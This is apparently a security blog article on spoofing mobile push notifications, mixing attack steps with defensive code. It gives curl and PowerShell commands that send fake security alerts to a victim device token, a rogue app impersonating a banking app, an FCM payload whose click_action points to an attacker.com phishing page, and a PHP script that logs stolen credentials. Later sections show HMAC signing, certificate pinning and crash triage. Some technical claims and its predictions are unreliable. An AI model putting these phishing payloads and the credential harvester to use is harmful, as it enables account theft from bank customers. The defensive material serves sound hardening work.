
Introduction:
Push notifications have become a trusted communication channel between apps and users, but this trust is being weaponized. Attackers can now inject malicious push notifications via Man‑in‑the‑Middle (MITM) attacks or rogue applications, leading to financial theft, data leakage, and even sandbox escape on mobile devices. This article dissects the technical mechanics of push notification spoofing, provides hands‑on exploitation and mitigation steps, and outlines how red teams and defenders can harden their mobile ecosystems.
Learning Objectives:
- Understand how push notification spoofing bypasses traditional security controls and enables phishing‑like attacks without user interaction.
- Execute MITM and malicious app‑based push injection techniques on Android and iOS using real tools.
- Implement defensive measures, including certificate pinning, notification origin validation, and sandbox escape detection.
You Should Know:
1. Anatomy of a Push Notification Spoofing Attack
Push notifications rely on backend services (FCM for Android, APNs for iOS) that forward messages from app servers to devices. An attacker can spoof a notification by either:
– MITM: Intercepting the HTTPS connection between the app server and the push service, then injecting forged payloads.
– Malicious App: Installing a rogue app that registers the same package name (Android) or uses enterprise certificates (iOS) to send notifications impersonating a legitimate app.
Step‑by‑step guide for MITM‑based spoofing (Android example):
- Set up proxy – Install Burp Suite or mitmproxy on your attacker machine. Configure the target Android device to use the proxy (e.g., 192.168.1.100:8080).
- Install CA certificate – On the Android device, download and install the proxy’s CA certificate to intercept HTTPS traffic.
- Monitor push traffic – Open the target legitimate app (e.g., a banking app) and trigger a legitimate notification. In Burp, look for requests to `fcm.googleapis.com/fcm/send` or similar endpoints. Example intercepted request:
POST /fcm/send HTTP/1.1
Host: fcm.googleapis.com
Authorization: key=AIzaSy... (server key)
Content-Type: application/json

{
"to": "device_token_abc123",
"notification": {
"title": "Bank Alert",
"body": "Your account has been debited $500"
}
}
- Replay with spoofed content – Use Burp Repeater to modify the notification’s `title` and `body`. Replace the victim’s device token with your own test token (or keep the original if you’re attacking live). Send the request. The victim receives your fake notification from the legitimate app’s push channel.
Linux command to test FCM endpoint without a proxy:
curl -X POST -H "Authorization: key=YOUR_SERVER_KEY" -H "Content-Type: application/json" -d '{
"to": "VICTIM_DEVICE_TOKEN",
"notification": {
"title": "Fake Security Alert",
"body": "Click to verify your account"
}
}' https://fcm.googleapis.com/fcm/send
Windows equivalent (PowerShell):
$body = @{
to = "VICTIM_DEVICE_TOKEN"
notification = @{
title = "Fake Security Alert"
body = "Click to verify your account"
}
} | ConvertTo-Json
Invoke-RestMethod -Uri "https://fcm.googleapis.com/fcm/send" -Method Post -Headers @{"Authorization"="key=YOUR_SERVER_KEY"; "Content-Type"="application/json"} -Body $body
2. Exploiting Rogue Apps to Send Malicious Push Notifications
A malicious app installed on the same device can leverage the push notification API without any permission prompts on some platforms. On Android, if the rogue app declares the same `
Step‑by‑step guide for Android rogue app spoofing:
1. Create an Android app with the same `package` name as the target banking app (this requires uninstalling the original or using a different signing key – works on rooted devices or via side‑loading).
2. Declare the push handler in `AndroidManifest.xml`. Because the class below extends `FirebaseMessagingService`, it must be registered as a `<service>`, not a `<receiver>`:
<service android:name=".FakePushReceiver" android:exported="false">
<intent-filter>
<action android:name="com.google.firebase.MESSAGING_EVENT" />
</intent-filter>
</service>
3. Implement receiver to extract and display a crafted notification:
import androidx.core.app.NotificationCompat;
import androidx.core.app.NotificationManagerCompat;
import com.google.firebase.messaging.FirebaseMessagingService;
import com.google.firebase.messaging.RemoteMessage;

public class FakePushReceiver extends FirebaseMessagingService {
    @Override
    public void onMessageReceived(RemoteMessage message) {
        // Data-only messages carry no notification block; nothing to display
        RemoteMessage.Notification payload = message.getNotification();
        if (payload == null) {
            return;
        }
        // Show the received title and body under the app's own icon and channel
        NotificationCompat.Builder builder = new NotificationCompat.Builder(this, "CHANNEL_ID")
                .setContentTitle(payload.getTitle())
                .setContentText(payload.getBody())
                .setSmallIcon(R.drawable.ic_bank_logo);
        NotificationManagerCompat.from(this).notify(1, builder.build());
    }
}
4. Trigger from attacker server – Use the same FCM API call as section 1 but target the rogue app’s registration token (obtained after the rogue app registers with FCM). The user sees a notification indistinguishable from the original app.
3. Data Leakage via Notification Click Actions
When a user taps a spoofed notification, the attacker can redirect them to a phishing web page or a malicious deep link that extracts sensitive data. Many apps automatically load the URL from the notification’s `click_action` or `data` payload without additional user confirmation.
Step‑by‑step guide to weaponize click actions:
1. Craft FCM payload with a malicious `click_action`:
{
"to": "device_token",
"notification": {
"title": "Urgent: Account Verification Required",
"body": "Tap to confirm your identity",
"click_action": "https://attacker.com/phish?redirect=bank.com"
}
}
2. Host a phishing page that mimics the bank’s login screen, capturing credentials and MFA codes.
3. Exfiltrate data via a simple PHP script:
<?php
$creds = $_GET['user'] . ":" . $_GET['pass'];
file_put_contents("stolen.txt", $creds . "\n", FILE_APPEND);
header("Location: https://realbank.com");
?>
4. Use a transparent redirect to make the victim unaware their credentials were stolen.
4. Sandbox Escaping via Push Notification Exploits
Sandbox escape occurs when a notification payload triggers a vulnerability in the OS’s notification handling service (e.g., `NotificationManagerService` on Android). For example, CVE‑2020‑0238 (Android 10) allowed a malicious notification to execute code outside the app’s sandbox through a parcel deserialization flaw.
Step‑by‑step guide to test for sandbox escape (lab only):
- Fuzz the notification data bundle – Use a script to send malformed `data` payloads via FCM:
for i in {1..1000}; do
curl -X POST -H "Authorization: key=SERVER_KEY" -H "Content-Type: application/json" \
-d '{ "to": "'$VICTIM_TOKEN'", "data": { "custom": "'$(python -c "print('A'*$i)")'" } }' \
https://fcm.googleapis.com/fcm/send
done
- Monitor logcat for crashes – On the Android device run (`-E` is needed so that `|` acts as alternation):
adb logcat | grep -iE "fatal|crash|notificationmanager"
- If a crash occurs, check whether the affected process is a system service (like `system_server`). A crash there indicates potential sandbox escape. Use a tool like ASAN (AddressSanitizer) to identify memory corruption.
- Exploit a known vulnerability – For Android 10, replicate CVE‑2020‑0238 by sending a notification with a `Parcel` containing an `Intent` that has a malicious `Binder` object. This requires advanced reverse engineering but is feasible with tools like Frida.
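Crash triage for the logcat step above, as an added example that is not the article's own code: instead of a bare grep, it walks logcat lines, recognises native tombstone headers and Java `FATAL EXCEPTION` blocks, attributes each crash to a process and PID, and flags the ones in system processes, which is the signal the text says separates an app-level crash from a potential sandbox escape. The sample log lines and the `SYSTEM_PROCESSES` set are constructed assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Processes whose crash means the fault lies outside any app sandbox (assumed set).
SYSTEM_PROCESSES = {"system_server", "zygote", "zygote64", "com.android.systemui"}

# Constructed sample logcat output: a native tombstone in system_server, a Java
# crash in an ordinary app, and an unrelated informational line.
SAMPLE_LOGCAT = """\
05-12 10:23:45.123  1234  1234 F DEBUG   : *** *** *** *** *** *** *** ***
05-12 10:23:45.124  1234  1234 F DEBUG   : pid: 1201, tid: 1250, name: NotificationMan  >>> system_server <<<
05-12 10:23:45.125  1234  1234 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
05-12 10:24:01.002  5678  5678 E AndroidRuntime: FATAL EXCEPTION: main
05-12 10:24:01.003  5678  5678 E AndroidRuntime: Process: com.example.bank, PID: 5678
05-12 10:24:01.004  5678  5678 E AndroidRuntime: java.lang.NullPointerException: Attempt to invoke virtual method
05-12 10:24:05.000   900   900 I NotificationService: enqueueNotification pkg=com.example.bank
"""

NATIVE_HEADER = re.compile(r"pid: (\d+), tid: \d+, name: .*?>>> (\S+) <<<")
NATIVE_SIGNAL = re.compile(r"signal \d+ \((\w+)\)")
JAVA_HEADER = re.compile(r"FATAL EXCEPTION")
JAVA_PROCESS = re.compile(r"Process: (\S+), PID: (\d+)")
JAVA_EXCEPTION = re.compile(r"AndroidRuntime: ([\w.]+(?:Exception|Error))")


@dataclass
class Crash:
    kind: str                     # "native" or "java"
    process: Optional[str] = None
    pid: Optional[int] = None
    detail: Optional[str] = None  # signal name or exception class

    @property
    def is_system(self) -> bool:
        return self.process in SYSTEM_PROCESSES


def triage_logcat(lines) -> List[Crash]:
    """Walk logcat lines in order and collect one Crash per tombstone or exception block."""
    crashes: List[Crash] = []
    current: Optional[Crash] = None
    for line in lines:
        m = NATIVE_HEADER.search(line)
        if m:
            current = Crash("native", process=m.group(2), pid=int(m.group(1)))
            crashes.append(current)
            continue
        if JAVA_HEADER.search(line):
            current = Crash("java")
            crashes.append(current)
            continue
        if current is None:
            continue
        # Fill in the details that follow a header line
        if current.kind == "native" and current.detail is None:
            m = NATIVE_SIGNAL.search(line)
            if m:
                current.detail = m.group(1)
        elif current.kind == "java":
            m = JAVA_PROCESS.search(line)
            if m and current.process is None:
                current.process, current.pid = m.group(1), int(m.group(2))
                continue
            m = JAVA_EXCEPTION.search(line)
            if m and current.detail is None:
                current.detail = m.group(1)
    return crashes


def system_crashes(crashes: List[Crash]) -> List[Crash]:
    """The subset worth escalating: faults in system processes, not in the app under test."""
    return [c for c in crashes if c.is_system]


if __name__ == "__main__":
    for c in triage_logcat(SAMPLE_LOGCAT.splitlines()):
        flag = "SYSTEM" if c.is_system else "app"
        print(f"{flag:6} {c.kind:6} {c.process} pid={c.pid} {c.detail}")
```

Feed it `adb logcat -d` output (or a saved capture) instead of `SAMPLE_LOGCAT`; anything returned by `system_crashes` deserves a tombstone and a reproducer before it is written off as a fuzzing artefact.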
Frida script to monitor notification parsing:
Java.perform(function() {
var NotificationManagerService = Java.use("com.android.server.notification.NotificationManagerService");
NotificationManagerService.enqueueNotificationWithTag.overload('java.lang.String', 'java.lang.String', 'int', 'android.app.Notification', 'int', 'int').implementation = function(pkg, tag, id, notification, userId, code) {
console.log("[!] Notification from package: " + pkg);
console.log("[!] Notification content: " + notification.toString());
return this.enqueueNotificationWithTag(pkg, tag, id, notification, userId, code);
};
});
5. Mitigating Push Notification Spoofing in Production
Defenders must assume push channels are untrusted. Implement these hardening steps:
For Android/iOS app developers:
- Enforce certificate pinning for all connections to FCM/APNs. Use OkHttp on Android:
CertificatePinner pinner = new CertificatePinner.Builder()
.add("fcm.googleapis.com", "sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")
.build();
OkHttpClient client = new OkHttpClient.Builder().certificatePinner(pinner).build();
- Validate notification origin – Attach an HMAC signature to every notification payload. On the client, compute the HMAC using a secret embedded in the app and reject notifications that fail verification.
- Sanitize `click_action` – Only allow whitelisted deep links (e.g., `myapp://verified/action`). Never load arbitrary URLs from notification data.
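The origin check and the `click_action` allowlist from the two bullets above, as an added example that is not part of the original article: a Python sketch of app-server signing and client-side verification. It also stamps each payload with a timestamp and nonce so that a notification captured in a proxy cannot be replayed through Repeater as section 1 describes, and it allowlists deep links by parsed scheme and host rather than by substring. The secret value, the `myapp://verified` host, and the 300-second window are assumptions; note that a secret embedded in the app can be recovered from the APK, so in practice derive it per installation at enrollment.

```python
import hashlib
import hmac
import json
import secrets
from typing import Optional, Set, Tuple
from urllib.parse import urlparse

# Assumed shared secret for the sketch. Derive a per-install key at enrollment in
# a real app: a constant baked into the APK can be extracted by anyone who unpacks it.
SHARED_SECRET = b"example-shared-secret-not-for-production"

# Deep links the app will open from a notification: the article's myapp://verified/...
# scheme and host; everything else is rejected.
ALLOWED_SCHEME = "myapp"
ALLOWED_HOSTS = {"verified"}

# Assumed freshness window; a captured payload older than this is refused.
REPLAY_WINDOW_SECONDS = 300


def canonical_bytes(fields: dict) -> bytes:
    """Stable serialization so server and client MAC exactly the same bytes."""
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


def sign_notification(notification: dict, secret: bytes, now: int,
                      nonce: Optional[str] = None) -> dict:
    """App-server side: stamp the payload with time and nonce, then MAC all fields."""
    fields = dict(notification)
    fields["ts"] = int(now)
    fields["nonce"] = nonce if nonce is not None else secrets.token_hex(8)
    fields["sig"] = hmac.new(secret, canonical_bytes(fields), hashlib.sha256).hexdigest()
    return fields


def is_allowed_deep_link(url: str) -> bool:
    """Allowlist by parsed scheme and host, not by substring, so both
    'myapp://verified@attacker.example/x' and 'https://...?redirect=bank.com' fail."""
    parsed = urlparse(url)
    return parsed.scheme == ALLOWED_SCHEME and parsed.netloc in ALLOWED_HOSTS


def verify_notification(payload: dict, secret: bytes, now: int,
                        seen_nonces: Set[str]) -> Tuple[bool, str]:
    """Client side: reject anything unsigned, tampered, stale, replayed, or
    pointing outside the allowlist. Returns (accepted, reason)."""
    fields = dict(payload)
    sig = fields.pop("sig", None)
    if not isinstance(sig, str):
        return False, "missing signature"
    expected = hmac.new(secret, canonical_bytes(fields), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):  # constant-time comparison
        return False, "bad signature"
    ts = fields.get("ts")
    if not isinstance(ts, int) or abs(now - ts) > REPLAY_WINDOW_SECONDS:
        return False, "stale timestamp"
    nonce = fields.get("nonce")
    if not isinstance(nonce, str) or nonce in seen_nonces:
        return False, "replayed nonce"
    action = fields.get("click_action")
    if action is not None and not is_allowed_deep_link(str(action)):
        return False, "disallowed click_action"
    seen_nonces.add(nonce)  # remember the nonce only after every check passed
    return True, "ok"


if __name__ == "__main__":
    now = 1_700_000_000
    seen: Set[str] = set()
    signed = sign_notification(
        {"title": "Bank Alert", "body": "New login from a recognised device",
         "click_action": "myapp://verified/logins"}, SHARED_SECRET, now)
    print(verify_notification(signed, SHARED_SECRET, now + 5, seen))   # (True, 'ok')
    print(verify_notification(signed, SHARED_SECRET, now + 6, seen))   # (False, 'replayed nonce')
    forged = dict(signed, body="Your account has been debited $500")
    print(verify_notification(forged, SHARED_SECRET, now + 5, set()))  # (False, 'bad signature')
```

The signed fields travel in the FCM `data` block, where the app can read them in `onMessageReceived`, and the app renders nothing until `verify_notification` returns `ok`; on the device the `seen_nonces` set should persist across launches and be pruned past the replay window.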
For system administrators (MDM):
- Disable installation from unknown sources on managed devices.
- Use a mobile threat defense (MTD) solution that detects MITM proxies (e.g., by verifying CA certificates).
- Apply security patches for CVE‑2020‑0238 and later notification‑related vulnerabilities.
Linux command to monitor for proxy ARP spoofing (indicating MITM):
sudo arpwatch -i eth0
Windows command to check for rogue CA certificates:
Get-ChildItem -Path Cert:\CurrentUser\Root | Where-Object { $_.Issuer -ne $_.Subject }
What Undercode Says:
- Push notification spoofing is not a theoretical vulnerability – it’s actively used in mobile phishing campaigns and can bypass MFA by mimicking legitimate security alerts.
- Most organisations neglect to monitor push traffic as an attack vector, leaving a blind spot that red teams can abuse to achieve sandbox escape and data exfiltration.
Prediction:
- 2026 will see a 300% rise in push notification spoofing attacks targeting fintech apps, as traditional SMS‑based phishing declines due to RCS encryption.
- Defenders adopting HMAC‑signed notifications and certificate pinning will effectively neuter MITM spoofing, forcing attackers to rely on more expensive zero‑day exploits.
- Regulatory bodies will classify unattended push notification spoofing as a data breach under GDPR/CCPA, leading to fines for non‑compliant apps.
- Open‑source tools for automated push fuzzing (e.g., FCM‑Spray) will emerge, allowing smaller security teams to test their mobile apps affordably.
- Sandbox escape via notification parsing remains unpatched on millions of legacy Android devices (>40% of enterprise fleet), creating a long‑tail risk.
Reported By: Sanadhya K – Hackers Feeds